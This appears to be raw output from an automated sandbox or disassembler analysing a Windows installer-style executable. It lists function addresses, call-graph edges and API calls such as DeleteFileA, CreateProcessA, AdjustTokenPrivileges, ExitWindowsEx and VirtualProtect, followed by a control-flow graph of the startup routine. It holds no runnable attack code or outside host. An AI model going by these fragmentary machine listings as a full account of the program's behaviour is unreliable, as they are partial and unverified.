4688->4666 4688->4676 4689 404068 18 API calls 4690 403e1f GetDlgItem 4689->4690 4691 403e34 4690->4691 4692 403e3c ShowWindow KiUserCallbackDispatcher 4690->4692 4691->4692 4719 40408a KiUserCallbackDispatcher 4692->4719 4694 403e66 EnableWindow 4699 403e7a 4694->4699 4695 403e7f GetSystemMenu EnableMenuItem SendMessageA 4696 403eaf SendMessageA 4695->4696 4695->4699 4696->4699 4699->4695 4720 40409d SendMessageA 4699->4720 4721 403b75 4699->4721 4724 405fda lstrcpynA 4699->4724 4701 403ede lstrlenA 4702 405ffc 17 API calls 4701->4702 4703 403eef SetWindowTextA 4702->4703 4725 401389 4703->4725 4705 403f33 DestroyWindow 4707 403f4d CreateDialogParamA 4705->4707 4705->4715 4706->4669 4706->4670 4706->4674 4706->4675 4706->4680 4706->4689 4706->4705 4708 403f80 4707->4708 4707->4715 4709 404068 18 API calls 4708->4709 4710 403f8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4709->4710 4711 401389 2 API calls 4710->4711 4712 403fd1 4711->4712 4712->4674 4713 403fd9 ShowWindow 4712->4713 4714 4040b4 SendMessageA 4713->4714 4714->4715 4715->4673 4715->4674 4717 4040cc 4716->4717 4718 4040bd SendMessageA 4716->4718 4717->4706 4718->4717 4719->4694 4720->4699 4722 405ffc 17 API calls 4721->4722 4723 403b83 SetWindowTextA 4722->4723 4723->4699 4724->4701 4727 401390 4725->4727 4726 4013fe 4726->4706 4727->4726 4728 4013cb MulDiv SendMessageA 4727->4728 4728->4727 4730 401389 2 API calls 4729->4730 4731 401420 4730->4731 4731->4676 4733 404048 4732->4733 4734 40404e SendMessageA 4732->4734 4733->4734 4734->4683 5645 401f98 5646 402b2c 17 API calls 5645->5646 5647 401f9f 5646->5647 5648 4062dd 2 API calls 5647->5648 5649 401fa5 5648->5649 5651 401fb7 5649->5651 5652 405f38 wsprintfA 5649->5652 5652->5651 5653 406a9b 5657 4064ea 5653->5657 5654 406e55 5655 406574 GlobalAlloc 5655->5654 5655->5657 5656 40656b GlobalFree 5656->5655 5657->5654 5657->5655 5657->5656 5657->5657 5658 4065e2 GlobalFree 5657->5658 5659 4065eb GlobalAlloc 5657->5659 5658->5659 5659->5654 5659->5657 5124 40159d 5125 402b2c 17 API calls 5124->5125 5126 4015a4 SetFileAttributesA 5125->5126 5127 4015b6 5126->5127 5667 40149d 5668 4014ab PostQuitMessage 5667->5668 5669 40234e 5667->5669 5668->5669 5128 401a1e 5129 402b2c 17 API calls 5128->5129 5130 401a27 ExpandEnvironmentStringsA 5129->5130 5131 401a3b 5130->5131 5133 401a4e 5130->5133 5132 401a40 lstrcmpA 5131->5132 5131->5133 5132->5133 5675 40289e 5676 402b0a 17 API calls 5675->5676 5677 4028a4 5676->5677 5678 4028e3 5677->5678 5679 4028cc 5677->5679 5686 402783 5677->5686 5682 4028fd 5678->5682 5683 4028ed 5678->5683 5680 4028e0 5679->5680 5681 4028d1 5679->5681 5680->5686 5690 405f38 wsprintfA 5680->5690 5689 405fda lstrcpynA 5681->5689 5684 405ffc 17 API calls 5682->5684 5685 402b0a 17 API calls 5683->5685 5684->5680 5685->5680 5689->5686 5690->5686 5691 40419e lstrcpynA lstrlenA 5692 40171f 5693 402b2c 17 API calls 5692->5693 5694 401726 SearchPathA 5693->5694 5695 401741 5694->5695 5696 401d20 5697 402b0a 17 API calls 5696->5697 5698 401d2e SetWindowLongA 5697->5698 5699 4029b8 5698->5699 4054 6ec02921 4055 6ec02971 4054->4055 4056 6ec02931 VirtualProtect 4054->4056 4056->4055 5700 402721 5701 402727 5700->5701 5702 4029b8 5701->5702 5703 40272f FindClose 5701->5703 5703->5702 5711 4027a3 5712 402b2c 17 API calls 5711->5712 5713 4027b1 5712->5713 5714 4027c7 5713->5714 5716 402b2c 17 API calls 5713->5716 5715 405b4e 2 API calls 5714->5715 5717 4027cd 5715->5717 5716->5714 5739 405b73 GetFileAttributesA CreateFileA 5717->5739 5719 4027da 5720 4027e6 GlobalAlloc 5719->5720 5721 40287d 5719->5721 5722 402874 CloseHandle 5720->5722 5723 4027ff 5720->5723 5724 402885 DeleteFileA 5721->5724 5725 402898 5721->5725 5722->5721 5740 4031ed SetFilePointer 5723->5740 5724->5725 5727 402805 5728 4031d7 ReadFile 5727->5728 5729 40280e GlobalAlloc 5728->5729 5730 402852 5729->5730 5731 40281e 5729->5731 5732 405c1a WriteFile 5730->5732 5733 402ffb 35 API calls 5731->5733 5734 40285e GlobalFree 5732->5734 5738 40282b 5733->5738 5735 402ffb 35 API calls 5734->5735 5737 402871 5735->5737 5736 402849 GlobalFree 5736->5730 5737->5722 5738->5736 5739->5719 5740->5727 4125 4023a7 4126 402b2c 17 API calls 4125->4126 4127 4023b8 4126->4127 4128 402b2c 17 API calls 4127->4128 4129 4023c1 4128->4129 4130 402b2c 17 API calls 4129->4130 4131 4023cb GetPrivateProfileStringA 4130->4131 5741 40292c 5742 402b0a 17 API calls 5741->5742 5743 402932 5742->5743 5744 402967 5743->5744 5746 402783 5743->5746 5747 402944 5743->5747 5745 405ffc 17 API calls 5744->5745 5744->5746 5745->5746 5747->5746 5749 405f38 wsprintfA 5747->5749 5749->5746 4429 402631 4430 402b0a 17 API calls 4429->4430 4431 40263b 4430->4431 4433 4026ab 4431->4433 4435 4026bb 4431->4435 4437 4026a9 4431->4437 4438 405beb ReadFile 4431->4438 4440 405f38 wsprintfA 4433->4440 4436 4026d1 SetFilePointer 4435->4436 4435->4437 4436->4437 4439 405c09 4438->4439 4439->4431 4440->4437 4441 401932 4442 401934 4441->4442 4443 402b2c 17 API calls 4442->4443 4444 401939 4443->4444 4447 4057a2 4444->4447 4487 405a60 4447->4487 4450 4057e1 4453 405919 4450->4453 4501 405fda lstrcpynA 4450->4501 4451 4057ca DeleteFileA 4452 401942 4451->4452 4453->4452 4519 4062dd FindFirstFileA 4453->4519 4455 405807 4456 40581a 4455->4456 4457 40580d lstrcatA 4455->4457 4502 4059b9 lstrlenA 4456->4502 4460 405820 4457->4460 4461 40582e lstrcatA 4460->4461 4463 405839 lstrlenA FindFirstFileA 4460->4463 4461->4463 4465 40590f 4463->4465 4485 40585d 4463->4485 4464 405937 4522 405972 lstrlenA CharPrevA 4464->4522 4465->4453 4467 40599d CharNextA 4467->4485 4469 40575a 5 API calls 4470 405949 4469->4470 4471 405963 4470->4471 4472 40594d 4470->4472 4473 405101 24 API calls 4471->4473 4472->4452 4476 405101 24 API calls 4472->4476 4473->4452 4474 4058ee FindNextFileA 4477 405906 FindClose 4474->4477 4474->4485 4478 40595a 4476->4478 4477->4465 4479 405db9 36 API calls 4478->4479 4482 405961 4479->4482 4481 4057a2 60 API calls 4481->4485 4482->4452 4483 405101 24 API calls 4483->4474 4484 405101 24 API calls 4484->4485 4485->4467 4485->4474 4485->4481 4485->4483 4485->4484 4506 405fda lstrcpynA 4485->4506 4507 40575a 4485->4507 4515 405db9 MoveFileExA 4485->4515 4525 405fda lstrcpynA 4487->4525 4489 405a71 4526 405a0b CharNextA CharNextA 4489->4526 4492 4057c2 4492->4450 4492->4451 4493 406244 5 API calls 4499 405a87 4493->4499 4494 405ab2 lstrlenA 4495 405abd 4494->4495 4494->4499 4497 405972 3 API calls 4495->4497 4496 4062dd 2 API calls 4496->4499 4498 405ac2 GetFileAttributesA 4497->4498 4498->4492 4499->4492 4499->4494 4499->4496 4500 4059b9 2 API calls 4499->4500 4500->4494 4501->4455 4503 4059c6 4502->4503 4504 4059d7 4503->4504 4505 4059cb CharPrevA 4503->4505 4504->4460 4505->4503 4505->4504 4506->4485 4532 405b4e GetFileAttributesA 4507->4532 4510 405787 4510->4485 4511 405775 RemoveDirectoryA 4513 405783 4511->4513 4512 40577d DeleteFileA 4512->4513 4513->4510 4514 405793 SetFileAttributesA 4513->4514 4514->4510 4516 405dda 4515->4516 4517 405dcd 4515->4517 4516->4485 4535 405c49 4517->4535 4520 4062f3 FindClose 4519->4520 4521 405933 4519->4521 4520->4521 4521->4452 4521->4464 4523 40593d 4522->4523 4524 40598c lstrcatA 4522->4524 4523->4469 4524->4523 4525->4489 4527 405a26 4526->4527 4529 405a36 4526->4529 4528 405a31 CharNextA 4527->4528 4527->4529 4531 405a56 4528->4531 4530 40599d CharNextA 4529->4530 4529->4531 4530->4529 4531->4492 4531->4493 4533 405b60 SetFileAttributesA 4532->4533 4534 405766 4532->4534 4533->4534 4534->4510 4534->4511 4534->4512 4536 405c95 GetShortPathNameA 4535->4536 4537 405c6f 4535->4537 4539 405db4 4536->4539 4540 405caa 4536->4540 4562 405b73 GetFileAttributesA CreateFileA 4537->4562 4539->4516 4540->4539 4542 405cb2 wsprintfA 4540->4542 4541 405c79 CloseHandle GetShortPathNameA 4541->4539 4543 405c8d 4541->4543 4544 405ffc 17 API calls 4542->4544 4543->4536 4543->4539 4545 405cda 4544->4545 4563 405b73 GetFileAttributesA CreateFileA 4545->4563 4547 405ce7 4547->4539 4548 405cf6 GetFileSize GlobalAlloc 4547->4548 4549 405d18 4548->4549 4550 405dad CloseHandle 4548->4550 4551 405beb ReadFile 4549->4551 4550->4539 4552 405d20 4551->4552 4552->4550 4564 405ad8 lstrlenA 4552->4564 4555 405d37 lstrcpyA 4558 405d59 4555->4558 4556 405d4b 4557 405ad8 4 API calls 4556->4557 4557->4558 4559 405d90 SetFilePointer 4558->4559 4569 405c1a WriteFile 4559->4569 4562->4541 4563->4547 4565 405b19 lstrlenA 4564->4565 4566 405af2 lstrcmpiA 4565->4566 4568 405b21 4565->4568 4567 405b10 CharNextA 4566->4567 4566->4568 4567->4565 4568->4555 4568->4556 4570 405c38 GlobalFree 4569->4570 4570->4550 4571 4022b2 4572 402b2c 17 API calls 4571->4572 4573 4022b8 4572->4573 4574 402b2c 17 API calls 4573->4574 4575 4022c1 4574->4575 4576 402b2c 17 API calls 4575->4576 4577 4022ca 4576->4577 4578 4062dd 2 API calls 4577->4578 4579 4022d3 4578->4579 4580 4022e4 lstrlenA lstrlenA 4579->4580 4581 4022d7 4579->4581 4583 405101 24 API calls 4580->4583 4582 405101 24 API calls 4581->4582 4585 4022df 4581->4585 4582->4585 4584 402320 SHFileOperationA 4583->4584 4584->4581 4584->4585 5757 4044b3 5758 4044c3 5757->5758 5759 4044e9 5757->5759 5760 404068 18 API calls 5758->5760 5761 4040cf 8 API calls 5759->5761 5762 4044d0 SetDlgItemTextA 5760->5762 5763 4044f5 5761->5763 5762->5759 5764 402334 5765 40233b 5764->5765 5768 40234e 5764->5768 5766 405ffc 17 API calls 5765->5766 5767 402348 5766->5767 5767->5768 5769 4056f6 MessageBoxIndirectA 5767->5769 5769->5768 4735 403235 SetErrorMode GetVersion 4736 403276 4735->4736 4737 40327c 4735->4737 4738 406372 5 API calls 4736->4738 4739 406304 3 API calls 4737->4739 4738->4737 4740 403292 lstrlenA 4739->4740 4740->4737 4741 4032a1 4740->4741 4742 406372 5 API calls 4741->4742 4743 4032a8 4742->4743 4744 406372 5 API calls 4743->4744 4745 4032af 4744->4745 4746 406372 5 API calls 4745->4746 4747 4032bb #17 OleInitialize SHGetFileInfoA 4746->4747 4825 405fda lstrcpynA 4747->4825 4750 403307 GetCommandLineA 4826 405fda lstrcpynA 4750->4826 4752 403319 4753 40599d CharNextA 4752->4753 4754 403342 CharNextA 4753->4754 4756 403352 4754->4756 4755 40341c 4757 40342f GetTempPathA 4755->4757 4756->4755 4756->4756 4762 40599d CharNextA 4756->4762 4766 40341e 4756->4766 4827 403204 4757->4827 4759 403447 4760 4034a1 DeleteFileA 4759->4760 4761 40344b GetWindowsDirectoryA lstrcatA 4759->4761 4837 402dc4 GetTickCount GetModuleFileNameA 4760->4837 4763 403204 12 API calls 4761->4763 4762->4756 4765 403467 4763->4765 4765->4760 4768 40346b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4765->4768 4921 405fda lstrcpynA 4766->4921 4767 4034b5 4769 40354b 4767->4769 4772 40353b 4767->4772 4777 40599d CharNextA 4767->4777 4771 403204 12 API calls 4768->4771 4924 40371d 4769->4924 4775 403499 4771->4775 4865 4037f7 4772->4865 4775->4760 4775->4769 4780 4034d0 4777->4780 4778 403683 4782 403705 ExitProcess 4778->4782 4783 40368b GetCurrentProcess OpenProcessToken 4778->4783 4779 403565 4931 4056f6 4779->4931 4786 403516 4780->4786 4787 40357b 4780->4787 4788 4036d6 4783->4788 4789 4036a6 LookupPrivilegeValueA AdjustTokenPrivileges 4783->4789 4790 405a60 18 API calls 4786->4790 4935 405661 4787->4935 4792 406372 5 API calls 4788->4792 4789->4788 4793 403521 4790->4793 4795 4036dd 4792->4795 4793->4769 4922 405fda lstrcpynA 4793->4922 4798 4036f2 ExitWindowsEx 4795->4798 4801 4036fe 4795->4801 4796 403591 lstrcatA 4797 40359c lstrcatA lstrcmpiA 4796->4797 4797->4769 4800 4035b8 4797->4800 4798->4782 4798->4801 4804 4035c4 4800->4804 4805 4035bd 4800->4805 4802 40140b 2 API calls 4801->4802 4802->4782 4803 403530 4923 405fda lstrcpynA 4803->4923 4943 405644 CreateDirectoryA 4804->4943 4938 4055c7 CreateDirectoryA 4805->4938 4810 4035c9 SetCurrentDirectoryA 4811 4035e3 4810->4811 4812 4035d8 4810->4812 4947 405fda lstrcpynA 4811->4947 4946 405fda lstrcpynA 4812->4946 4815 405ffc 17 API calls 4816 403622 DeleteFileA 4815->4816 4817 40362f CopyFileA 4816->4817 4822 4035f1 4816->4822 4817->4822 4818 403677 4819 405db9 36 API calls 4818->4819 4819->4769 4820 405db9 36 API calls 4820->4822 4821 405ffc 17 API calls 4821->4822 4822->4815 4822->4818 4822->4820 4822->4821 4824 403663 CloseHandle 4822->4824 4948 405679 CreateProcessA 4822->4948 4824->4822 4825->4750 4826->4752 4828 406244 5 API calls 4827->4828 4829 403210 4828->4829 4830 40321a 4829->4830 4831 405972 3 API calls 4829->4831 4830->4759 4832 403222 4831->4832 4833 405644 2 API calls 4832->4833 4834 403228 4833->4834 4835 405ba2 2 API calls 4834->4835 4836 403233 4835->4836 4836->4759 4951 405b73 GetFileAttributesA CreateFileA 4837->4951 4839 402e04 4858 402e14 4839->4858 4952 405fda lstrcpynA 4839->4952 4841 402e2a 4842 4059b9 2 API calls 4841->4842 4843 402e30 4842->4843 4953 405fda lstrcpynA 4843->4953 4845 402e3b GetFileSize 4846 402f35 4845->4846 4860 402e52 4845->4860 4954 402d60 4846->4954 4848 402f3e 4850 402f6e GlobalAlloc 4848->4850 4848->4858 4990 4031ed SetFilePointer 4848->4990 4965 4031ed SetFilePointer 4850->4965 4852 402fa1 4854 402d60 6 API calls 4852->4854 4854->4858 4855 402f57 4859 4031d7 ReadFile 4855->4859 4856 402f89 4966 402ffb 4856->4966 4858->4767 4861 402f62 4859->4861 4860->4846 4860->4852 4860->4858 4862 402d60 6 API calls 4860->4862 4987 4031d7 4860->4987 4861->4850 4861->4858 4862->4860 4863 402f95 4863->4858 4863->4863 4864 402fd2 SetFilePointer 4863->4864 4864->4858 4866 406372 5 API calls 4865->4866 4867 40380b 4866->4867 4868 403811 4867->4868 4869 403823 4867->4869 5018 405f38 wsprintfA 4868->5018 4870 405ec1 3 API calls 4869->4870 4871 40384e 4870->4871 4873 40386c lstrcatA 4871->4873 4875 405ec1 3 API calls 4871->4875 4874 403821 4873->4874 5003 403abc 4874->5003 4875->4873 4878 405a60 18 API calls 4879 40389e 4878->4879 4880 403927 4879->4880 4882 405ec1 3 API calls 4879->4882 4881 405a60 18 API calls 4880->4881 4883 40392d 4881->4883 4884 4038ca 4882->4884 4885 40393d LoadImageA 4883->4885 4886 405ffc 17 API calls 4883->4886 4884->4880 4889 4038e6 lstrlenA 4884->4889 4892 40599d CharNextA 4884->4892 4887 4039e3 4885->4887 4888 403964 RegisterClassA 4885->4888 4886->4885 4891 40140b 2 API calls 4887->4891 4890 40399a SystemParametersInfoA CreateWindowExA 4888->4890 4920 4039ed 4888->4920 4893 4038f4 lstrcmpiA 4889->4893 4894 40391a 4889->4894 4890->4887 4895 4039e9 4891->4895 4897 4038e4 4892->4897 4893->4894 4898 403904 GetFileAttributesA 4893->4898 4896 405972 3 API calls 4894->4896 4899 403abc 18 API calls 4895->4899 4895->4920 4900 403920 4896->4900 4897->4889 4901 403910 4898->4901 4903 4039fa 4899->4903 5019 405fda lstrcpynA 4900->5019 4901->4894 4902 4059b9 2 API calls 4901->4902 4902->4894 4905 403a06 ShowWindow 4903->4905 4906 403a89 4903->4906 4908 406304 3 API calls 4905->4908 5011 4051d3 OleInitialize 4906->5011 4910 403a1e 4908->4910 4909 403a8f 4911 403a93 4909->4911 4912 403aab 4909->4912 4913 403a2c GetClassInfoA 4910->4913 4915 406304 3 API calls 4910->4915 4918 40140b 2 API calls 4911->4918 4911->4920 4914 40140b 2 API calls 4912->4914 4916 403a40 GetClassInfoA RegisterClassA 4913->4916 4917 403a56 DialogBoxParamA 4913->4917 4914->4920 4915->4913 4916->4917 4919 40140b 2 API calls 4917->4919 4918->4920 4919->4920 4920->4769 4921->4757 4922->4803 4923->4772 4925 403735 4924->4925 4926 403727 CloseHandle 4924->4926 5021 403762 4925->5021 4926->4925 4929 4057a2 67 API calls 4930 403554 OleUninitialize 4929->4930 4930->4778 4930->4779 4932 40570b 4931->4932 4933 403573 ExitProcess 4932->4933 4934 40571f MessageBoxIndirectA 4932->4934 4934->4933 4936 406372 5 API calls 4935->4936 4937 403580 lstrcatA 4936->4937 4937->4796 4937->4797 4939 4035c2 4938->4939 4940 405618 GetLastError 4938->4940 4939->4810 4940->4939 4941 405627 SetFileSecurityA 4940->4941 4941->4939 4942 40563d GetLastError 4941->4942 4942->4939 4944 405654 4943->4944 4945 405658 GetLastError 4943->4945 4944->4810 4945->4944 4946->4811 4947->4822 4949 4056b8 4948->4949 4950 4056ac CloseHandle 4948->4950 4949->4822 4950->4949 4951->4839 4952->4841 4953->4845 4955 402d81 4954->4955 4956 402d69 4954->4956 4959 402d91 GetTickCount 4955->4959 4960 402d89 4955->4960 4957 402d72 DestroyWindow 4956->4957 4958 402d79 4956->4958 4957->4958 4958->4848 4961 402dc2 4959->4961 4962 402d9f CreateDialogParamA ShowWindow 4959->4962 4991 4063ae 4960->4991 4961->4848 4962->4961 4965->4856 4968 403011 4966->4968 4967 40303c 4970 4031d7 ReadFile 4967->4970 4968->4967 5002 4031ed SetFilePointer 4968->5002 4971 403047 4970->4971 4972 403177 4971->4972 4973 403059 GetTickCount 4971->4973 4975 403161 4971->4975 4974 40317b 4972->4974 4978 403193 4972->4978 4984 40306c 4973->4984 4976 4031d7 ReadFile 4974->4976 4975->4863 4976->4975 4977 4031d7 ReadFile 4977->4978 4978->4975 4978->4977 4980 405c1a WriteFile 4978->4980 4979 4031d7 ReadFile 4979->4984 4980->4978 4982 4030d2 GetTickCount 4982->4984 4983 4030fb MulDiv wsprintfA 4985 405101 24 API calls 4983->4985 4984->4975 4984->4979 4984->4982 4984->4983 4986 405c1a WriteFile 4984->4986 4995 4064b7 4984->4995 4985->4984 4986->4984 4988 405beb ReadFile 4987->4988 4989 4031ea 4988->4989 4989->4860 4990->4855 4992 4063cb PeekMessageA 4991->4992 4993 4063c1 DispatchMessageA 4992->4993 4994 402d8f 4992->4994 4993->4992 4994->4848 4996 4064dc 4995->4996 4999 4064e4 4995->4999 4996->4984 4997 406574 GlobalAlloc 4997->4996 4997->4999 4998 40656b GlobalFree 4998->4997 4999->4996 4999->4997 4999->4998 5000 4065e2 GlobalFree 4999->5000 5001 4065eb GlobalAlloc 4999->5001 5000->5001 5001->4996 5001->4999 5002->4967 5004 403ad0 5003->5004 5020 405f38 wsprintfA 5004->5020 5006 403b41 5007 403b75 18 API calls 5006->5007 5009 403b46 5007->5009 5008 40387c 5008->4878 5009->5008 5010 405ffc 17 API calls 5009->5010 5010->5009 5012 4040b4 SendMessageA 5011->5012 5015 4051f6 5012->5015 5013 40521d 5014 4040b4 SendMessageA 5013->5014 5016 40522f OleUninitialize 5014->5016 5015->5013 5017 401389 2 API calls 5015->5017 5016->4909 5017->5015 5018->4874 5019->4880 5020->5006 5022 403770 5021->5022 5023 40373a 5022->5023 5024 403775 FreeLibrary GlobalFree 5022->5024 5023->4929 5024->5023 5024->5024 5770 4037b5 5771 4037c0 5770->5771 5772 4037c4 5771->5772 5773 4037c7 GlobalAlloc 5771->5773 5773->5772 5774 4014b7 5775 4014bd 5774->5775 5776 401389 2 API calls 5775->5776 5777 4014c5 5776->5777 5778 6ec01837 5779 6ec0185a 5778->5779 5780 6ec0188a GlobalFree 5779->5780 5781 6ec0189c 5779->5781 5780->5781 5782 6ec01266 2 API calls 5781->5782 5783 6ec01a1e GlobalFree GlobalFree 5782->5783 5784 402138 5785 402b2c 17 API calls 5784->5785 5786 40213f 5785->5786 5787 402b2c 17 API calls 5786->5787 5788 402149 5787->5788 5789 402b2c 17 API calls 5788->5789 5790 402153 5789->5790 5791 402b2c 17 API calls 5790->5791 5792 40215d 5791->5792 5793 402b2c 17 API calls 5792->5793 5794 402167 5793->5794 5795 4021a9 CoCreateInstance 5794->5795 5796 402b2c 17 API calls 5794->5796 5799 4021c8 5795->5799 5801 402273 5795->5801 5796->5795 5797 401423 24 API calls 5798 4022a9 5797->5798 5800 402253 MultiByteToWideChar 5799->5800 5799->5801 5800->5801 5801->5797 5801->5798 5802 6ec01638 5803 6ec01667 5802->5803 5804 6ec01a98 18 API calls 5803->5804 5805 6ec0166e 5804->5805 5806 6ec01681 5805->5806 5807 6ec01675 5805->5807 5809 6ec016a8 5806->5809 5810 6ec0168b 5806->5810 5808 6ec01266 2 API calls 5807->5808 5818 6ec0167f 5808->5818 5812 6ec016d2 5809->5812 5813 6ec016ae 5809->5813 5811 6ec014e2 3 API calls 5810->5811 5815 6ec01690 5811->5815 5814 6ec014e2 3 API calls 5812->5814 5816 6ec01559 3 API calls 5813->5816 5814->5818 5819 6ec01559 3 API calls 5815->5819 5817 6ec016b3 5816->5817 5820 6ec01266 2 API calls 5817->5820 5821 6ec01696 5819->5821 5822 6ec016b9 GlobalFree 5820->5822 5823 6ec01266 2 API calls 5821->5823 5822->5818 5824 6ec016cd GlobalFree 5822->5824 5825 6ec0169c GlobalFree 5823->5825 5824->5818 5825->5818 5079 4015bb 5080 402b2c 17 API calls 5079->5080 5081 4015c2 5080->5081 5082 405a0b 4 API calls 5081->5082 5094 4015ca 5082->5094 5083 401624 5085 401652 5083->5085 5086 401629 5083->5086 5084 40599d CharNextA 5084->5094 5089 401423 24 API calls 5085->5089 5087 401423 24 API calls 5086->5087 5088 401630 5087->5088 5098 405fda lstrcpynA 5088->5098 5096 40164a 5089->5096 5091 405644 2 API calls 5091->5094 5092 405661 5 API calls 5092->5094 5093 40163b SetCurrentDirectoryA 5093->5096 5094->5083 5094->5084 5094->5091 5094->5092 5095 40160c GetFileAttributesA 5094->5095 5097 4055c7 4 API calls 5094->5097 5095->5094 5097->5094 5098->5093 5826 40273b 5827 402741 5826->5827 5828 402745 FindNextFileA 5827->5828 5831 402757 5827->5831 5829 402796 5828->5829 5828->5831 5832 405fda lstrcpynA 5829->5832 5832->5831 5833 4016bb 5834 402b2c 17 API calls 5833->5834 5835 4016c1 GetFullPathNameA 5834->5835 5836 4016f9 5835->5836 5837 4016d8 5835->5837 5838 4029b8 5836->5838 5839 40170d GetShortPathNameA 5836->5839 5837->5836 5840 4062dd 2 API calls 5837->5840 5839->5838 5841 4016e9 5840->5841 5841->5836 5843 405fda lstrcpynA 5841->5843 5843->5836 5099 40243d 5100 402b2c 17 API calls 5099->5100 5101 40244f 5100->5101 5102 402b2c 17 API calls 5101->5102 5103 402459 5102->5103 5116 402bbc 5103->5116 5106 4029b8 5107 40248e 5108 40249a 5107->5108 5110 402b0a 17 API calls 5107->5110 5111 4024b9 RegSetValueExA 5108->5111 5113 402ffb 35 API calls 5108->5113 5109 402b2c 17 API calls 5112 402487 lstrlenA 5109->5112 5110->5108 5114 4024cf RegCloseKey 5111->5114 5112->5107 5113->5111 5114->5106 5117 402bd7 5116->5117 5120 405e8e 5117->5120 5121 405e9d 5120->5121 5122 405ea8 RegCreateKeyExA 5121->5122 5123 402469 5121->5123 5122->5123 5123->5106 5123->5107 5123->5109 5844 6ec0103d 5845 6ec0101b 5 API calls 5844->5845 5846 6ec01056 5845->5846 5134 40523f 5135 405261 GetDlgItem GetDlgItem GetDlgItem 5134->5135 5136 4053ea 5134->5136 5180 40409d SendMessageA 5135->5180 5138 4053f2 GetDlgItem CreateThread CloseHandle 5136->5138 5139 40541a 5136->5139 5138->5139 5183 4051d3 5 API calls 5138->5183 5140 405448 5139->5140 5142 405430 ShowWindow ShowWindow 5139->5142 5143 405469 5139->5143 5144 405450 5140->5144 5145 4054a3 5140->5145 5141 4052d1 5150 4052d8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5141->5150 5182 40409d SendMessageA 5142->5182 5149 4040cf 8 API calls 5143->5149 5147 405458 5144->5147 5148 40547c ShowWindow 5144->5148 5145->5143 5153 4054b0 SendMessageA 5145->5153 5154 404041 SendMessageA 5147->5154 5156 40549c 5148->5156 5157 40548e 5148->5157 5155 405475 5149->5155 5151 405346 5150->5151 5152 40532a SendMessageA SendMessageA 5150->5152 5158 405359 5151->5158 5159 40534b SendMessageA 5151->5159 5152->5151 5153->5155 5160 4054c9 CreatePopupMenu 5153->5160 5154->5143 5162 404041 SendMessageA 5156->5162 5161 405101 24 API calls 5157->5161 5164 404068 18 API calls 5158->5164 5159->5158 5163 405ffc 17 API calls 5160->5163 5161->5156 5162->5145 5165 4054d9 AppendMenuA 5163->5165 5166 405369 5164->5166 5167 4054f7 GetWindowRect 5165->5167 5168 40550a TrackPopupMenu 5165->5168 5169 405372 ShowWindow 5166->5169 5170 4053a6 GetDlgItem SendMessageA 5166->5170 5167->5168 5168->5155 5171 405526 5168->5171 5172 405395 5169->5172 5173 405388 ShowWindow 5169->5173 5170->5155 5174 4053cd SendMessageA SendMessageA 5170->5174 5175 405545 SendMessageA 5171->5175 5181 40409d SendMessageA 5172->5181 5173->5172 5174->5155 5175->5175 5176 405562 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5175->5176 5178 405584 SendMessageA 5176->5178 5178->5178 5179 4055a6 GlobalUnlock SetClipboardData CloseClipboard 5178->5179 5179->5155 5180->5141 5181->5170 5182->5140 5847 401b3f 5848 402b2c 17 API calls 5847->5848 5849 401b46 5848->5849 5850 402b0a 17 API calls 5849->5850 5851 401b4f wsprintfA 5850->5851 5852 4029b8 5851->5852

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 403235-403274 SetErrorMode GetVersion 1 403276-40327e call 406372 0->1 2 403287 0->2 1->2 8 403280 1->8 3 40328c-40329f call 406304 lstrlenA 2->3 9 4032a1-4032bd call 406372 * 3 3->9 8->2 16 4032ce-40332c #17 OleInitialize SHGetFileInfoA call 405fda GetCommandLineA call 405fda 9->16 17 4032bf-4032c5 9->17 24 403338-40334d call 40599d CharNextA 16->24 25 40332e-403333 16->25 17->16 22 4032c7 17->22 22->16 28 403412-403416 24->28 25->24 29 403352-403355 28->29 30 40341c 28->30 31 403357-40335b 29->31 32 40335d-403365 29->32 33 40342f-403449 GetTempPathA call 403204 30->33 31->31 31->32 35 403367-403368 32->35 36 40336d-403370 32->36 40 4034a1-4034bb DeleteFileA call 402dc4 33->40 41 40344b-403469 GetWindowsDirectoryA lstrcatA call 403204 33->41 35->36 38 403402-40340f call 40599d 36->38 39 403376-40337a 36->39 38->28 57 403411 38->57 43 403392-4033bf 39->43 44 40337c-403382 39->44 59 4034c1-4034c7 40->59 60 40354f-40355f call 40371d OleUninitialize 40->60 41->40 58 40346b-40349b GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403204 41->58 48 4033c1-4033c7 43->48 49 4033d2-403400 43->49 45 403384-403386 44->45 46 403388 44->46 45->43 45->46 46->43 53 4033c9-4033cb 48->53 54 4033cd 48->54 49->38 55 40341e-40342a call 405fda 49->55 53->49 53->54 54->49 55->33 57->28 58->40 58->60 63 4034c9-4034d4 call 40599d 59->63 64 40353f-403546 call 4037f7 59->64 70 403683-403689 60->70 71 403565-403575 call 4056f6 ExitProcess 60->71 77 4034d6-4034ff 63->77 78 40350a-403514 63->78 72 40354b 64->72 75 403705-40370d 70->75 76 40368b-4036a4 GetCurrentProcess OpenProcessToken 70->76 72->60 80 403713-403717 ExitProcess 75->80 81 40370f 75->81 85 4036d6-4036e4 call 406372 76->85 86 4036a6-4036d0 LookupPrivilegeValueA AdjustTokenPrivileges 76->86 79 403501-403503 77->79 83 403516-403523 call 405a60 78->83 84 40357b-40358f call 405661 lstrcatA 78->84 79->78 87 403505-403508 79->87 81->80 83->60 94 403525-40353b call 405fda * 2 83->94 95 403591-403597 lstrcatA 84->95 96 40359c-4035b6 lstrcatA lstrcmpiA 84->96 97 4036f2-4036fc ExitWindowsEx 85->97 98 4036e6-4036f0 85->98 86->85 87->78 87->79 94->64 95->96 96->60 100 4035b8-4035bb 96->100 97->75 101 4036fe-403700 call 40140b 97->101 98->97 98->101 104 4035c4 call 405644 100->104 105 4035bd-4035c2 call 4055c7 100->105 101->75 112 4035c9-4035d6 SetCurrentDirectoryA 104->112 105->112 113 4035e3-40360b call 405fda 112->113 114 4035d8-4035de call 405fda 112->114 118 403611-40362d call 405ffc DeleteFileA 113->118 114->113 121 40366e-403675 118->121 122 40362f-40363f CopyFileA 118->122 121->118 123 403677-40367e call 405db9 121->123 122->121 124 403641-403661 call 405db9 call 405ffc call 405679 122->124 123->60 124->121 133 403663-40366a CloseHandle 124->133 133->121
                                                                                                                                      APIs
